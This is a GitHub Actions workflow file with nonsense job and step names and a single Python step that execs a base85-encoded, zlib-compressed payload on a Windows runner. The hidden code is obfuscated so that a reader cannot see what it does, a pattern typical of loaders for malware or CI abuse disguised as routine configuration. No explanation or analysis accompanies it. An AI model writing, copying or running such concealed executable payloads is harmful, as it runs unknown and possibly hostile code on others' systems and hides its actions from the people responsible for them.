name: kirl

on:
  workflow_dispatch:

jobs:
  kirr:
    runs-on: windows-2022

    steps:
    - name: koooo
      shell: python
      run: |
        __import__("builtins").exec(__import__("zlib").decompress(__import__("base64").b85decode("c-pO0OK;mS48HqUXzn2i5Ic_JI&OdhE1EruJrFe6c9;u8vFTc<ENPP5G?)GMNp_v3-F6tZ07fX1;zxcY<&au%sgY{7Lh>Ax8Y6DLMp8<)zJzZLC_P4+)G$W5-V0EUBPiYzoe8WfbZ-28EBWvsFe@4ba_D|fJ0GJ2cjOd&$0)}|X5yL~Zl$$Qi^=4c=&ITJIj<+3zn4?q6#W6;0@D)-6tDs{>7z{U1AltzhjH(>Bh1*8_mIR{9C?b|GALT;K2-&|1Z|<`XJH&BQHjghJc#CTeiqJ)={AA@Ct(ml5+u2?o)yy|Ny=Ff24x;cr@?8wje;PET*oP(M2CtxfZ=H2AoF|5n{SQ=RuZ^};V}nebVT8(iwF#FDP*z`eXyTR@nyq?UtPg>AXNpFx?|*em%OeG<5pgS_O3M4E6D{&y+_{4HfQkm-TM!VbiG%`mR>ee8bU8Q(~?tjC4Cgr4ak}>Owk(TJ;(v_7_I>g$|bP<W^LRU<eG4%jOjC`4WPiiF#}OSes{i+4UGOa<5z9D-bc`{iG&@d^tz#dyd_bVn>Ug-0u8RA<{Hov)Sc#H@Q;}Pm!<RzVQY<BTGH#~%G>1Pz}zRZ1{aO4OeB)GJ_qKe&#P$LufR@&Qadh-KMnu`ZR@Z*X8(<nfy9N$${xi_b3Ks7i{AriEcLT-Jpx!6N({u&Tw3zHZgJehz;@@Gj(Ynl_=*CE;p`Em#)S3Jf7y{%dpze|5>G1cR8MkkRlACq@v!xD!JpyBfl1(mlqkz=1F{UAn`O^3n@^Ux3+KdMF!t^Z^X-#Cso##tEcCBb+c0)vxwQG8^cY=1j^jKEKL88Ux%>")).decode())
